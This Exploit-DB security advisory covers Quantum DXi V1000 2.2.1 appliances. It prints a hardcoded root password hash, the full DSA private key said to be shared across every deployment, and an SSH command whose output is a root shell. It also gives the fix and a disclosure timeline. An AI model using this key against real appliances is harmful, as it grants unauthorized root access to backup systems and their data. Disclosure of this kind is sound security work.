Quantum DXi V1000 2.2.1 – Static SSH Key

• Exploit Database
• 18 阅读

• 作者： xistence
  日期： 2014-03-19
• 类别：

  • remote
  平台：

  • unix
• 来源：https://www.exploit-db.com/exploits/32372/

• -----------
  Author:
  -----------
  
  xistence < xistence[at]0x90[.]nl >
  
  -------------------------
  Affected products:
  -------------------------
  
  Quantum DXi V1000 2.2.1 and below
  
  -------------------------
  Affected vendors:
  -------------------------
  
  Quantum
  http://quantum.com/
  
  -------------------------
  Product description:
  -------------------------
  
  Quantum DXi® V-Series is a virtual deduplication backup appliance that
  protects physical and
  virtual data across remote sites, the datacenter and cloud deployments.
  
  ----------
  Details:
  ----------
  
  [ 0x01 - Default root user ]
  
  The root user has a hardcoded password that is unknown and not changeable.
  Normally access is only through the restricted shells.
  
  The /etc/shadow file shows the following hash:
  root:$1$FGOgdWM7$dac9P0EJgTSX8a4zc4TXJ/:15783:0:99999:7:::
  
  
  [ 0x02 - Known SSH Private Key ]
  
  
  The /root/.ssh/authorized_keys on the appliance contains the following key
  (same with every deployment):
  
  -----BEGIN DSA PRIVATE KEY-----
  MIIBugIBAAKBgQCEgBNwgF+IbMU8NHUXNIMfJ0ONa91ZI/TphuixnilkZqcuwur2
  hMbrqY8Yne+n3eGkuepQlBBKEZSd8xPd6qCvWnCOhBqhkBS7g2dH6jMkUl/opX/t
  Rw6P00crq2oIMafR4/SzKWVW6RQEzJtPnfV7O3i5miY7jLKMDZTn/DRXRwIVALB2
  +o4CRHpCG6IBqlD/2JW5HRQBAoGAaSzKOHYUnlpAoX7+ufViz37cUa1/x0fGDA/4
  6mt0eD7FTNoOnUNdfdZx7oLXVe7mjHjqjif0EVnmDPlGME9GYMdi6r4FUozQ33Y5
  PmUWPMd0phMRYutpihaExkjgl33AH7mp42qBfrHqZ2oi1HfkqCUoRmB6KkdkFosr
  E0apJ5cCgYBLEgYmr9XCSqjENFDVQPFELYKT7Zs9J87PjPS1AP0qF1OoRGZ5mefK
  6X/6VivPAUWmmmev/BuAs8M1HtfGeGGzMzDIiU/WZQ3bScLB1Ykrcjk7TOFD6xrn
  k/inYAp5l29hjidoAONcXoHmUAMYOKqn63Q2AsDpExVcmfj99/BlpQIUYS6Hs70u
  B3Upsx556K/iZPPnJZE=
  -----END DSA PRIVATE KEY-----
  
  Using the key on a remote system to login through SSH will give a root
  shell:
  
  $ ssh -i quantum.key root@192.168.2.117
  Last login: Mon Sep 23 21:27:19 2013 from 192.168.2.71
  
  Product Model= DXiV1000
  Hardware Configuration = V1000
  System Version = 2.2.1_MC
  Base OS Version= 2.2.1_MC-9499
  Application Version= 2.2.1_MC-50278
  SCM Build Version= Build14
  Kernel Version = 2.6.18-164.15.1.qtm.4
  
  [root@DXi000C29FB1EA1 ~]# id
  uid=0(root) gid=0(root)
  groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),103(adic)
  
  
  -----------
  Solution:
  -----------
  
  Upgrade to version 2.3.0.1 or newer
  
  --------------
  Timeline:
  --------------
  
  30-09-2013 - Issues discovered and vendor notified
  30-09-2013 - Reply from vendor asking for more details
  01-10-2013 - Supplied more details how to replicate
  19-11-2013 - Asked for status update
  19-11-2013 - Reply from vendor that an updated release is due for March 2014
  xx-xx-2014 - Quantum DXi V1000 2.3.0.1 released
  17-03-2014 - Public disclosure